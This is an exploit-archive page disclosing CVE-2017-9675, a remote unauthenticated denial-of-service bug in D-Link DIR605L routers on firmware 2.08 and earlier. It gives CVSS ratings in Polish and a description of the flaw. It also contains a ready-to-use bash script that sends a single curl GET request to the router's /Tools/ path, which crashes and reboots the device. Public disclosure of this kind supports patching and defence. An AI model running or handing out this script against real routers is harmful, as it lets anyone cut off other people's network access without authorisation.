D-Link DIR605L 2.08 Denial Of Service

2017.11.16

Credit: Enrique Castillo

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2017-9675

CWE: CWE-20

Ogólna skala CVSS: 7.8/10

Znaczenie: 6.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Brak

Wpływ na dostępność: Pełny

# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

D-Link DIR605L 2.08 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.